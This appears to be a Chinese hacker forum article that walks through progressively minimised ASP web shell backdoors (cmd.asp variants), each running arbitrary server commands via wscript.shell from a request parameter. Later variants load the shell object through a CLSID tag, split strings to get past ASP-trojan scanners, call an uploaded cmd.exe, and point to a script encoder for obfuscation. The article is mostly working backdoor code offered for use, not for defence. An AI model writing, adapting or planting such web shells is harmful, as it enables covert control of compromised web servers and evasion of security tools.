关于最小asp的后门的几个有趣变化

猪猪

文章作者：lcx   

这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的，只指像cmd.asp或2005a.asp的。
第一个，来看zzzeva免fso的cmd.asp
代码如下：

1. <form method="post">
   
2. <input type=text name="cmd" size=60>
   
3. <input type=submit value="run"></form>
   
4. <textarea readonly cols=80 rows=20>
   
5. <%response.write server.createobject("wscript.shell").exec("cmd.exe /c
   
6. "&request.form("cmd")).stdout.readall%>
   
7. </textarea>

复制代码

是不是觉得有点长了？在注入时写有点不好写。那来改一下。
第二个，更改zzzeva免fso的cmd.asp
代码如下：

1. <textarea readonly cols=80 rows=20>
   
2. <%response.write server.createobject("wscript.shell").exec("cmd.exe /c
   
3. "&request("cmd")).stdout.readall%>

复制代码

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便，其实如果不为美观，还可以更短，那来第三个
第三个，缩短的cmd.asp

1. <%response.write server.createobject("wscript.shell").exec("cmd.exe /c
   
2. "&request("cmd")).stdout.readall%>

复制代码

这里用了response.write，变量用了cmd。为什么不更短呢？
第四个，更短的cmd.asp

1. <%=server.createobject("wscript.shell").exec("cmd.exe /c
   
2. "&request("c")).stdout.readall%>

复制代码

好像这就是最短的了。除了短，我们还要在别的地方下功夫。
第五个，wscript.shell被改名怎么办？
代码：

1. <ObjEct runat=sErvEr iD=kk scOpE=pagE
   
2. classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
   
3. <%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

复制代码

当然，classid值在不同系统下有所不同。这个要自行更改

第六个，被一些杀asp木马的软件检测出来怎么办？
把变量拆开呀。代码：

1. <%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
   
2. "&request("c")).stdout.readall%>

复制代码

或

1. <%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
   
2. "&request("c")).stdout.readall%>

复制代码

这里代码引号里的东东都可以随便拆的，像还可以拆成

1. <%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
   
2. "&request("c")).stdout.readall%>

复制代码

第7个,cmd.exe不让调用怎么办？
这个你自己上传一个cmd.exe，放在一个可以调用的目录下，代码更改如下：

1. <%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c
   
2. "&request("c")).stdout.readall%>

复制代码

第8个,asp代码可以加密吗？
当然可以了

工具：
http://download.microsoft.com/download/winscript56/Install/1.0/WIN98MeXP/CN/sce10chs.exe